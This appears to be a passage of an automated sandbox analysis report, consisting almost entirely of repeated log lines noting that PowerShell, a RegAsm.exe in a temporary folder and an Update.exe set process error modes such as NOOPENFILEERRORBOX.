            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Update.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
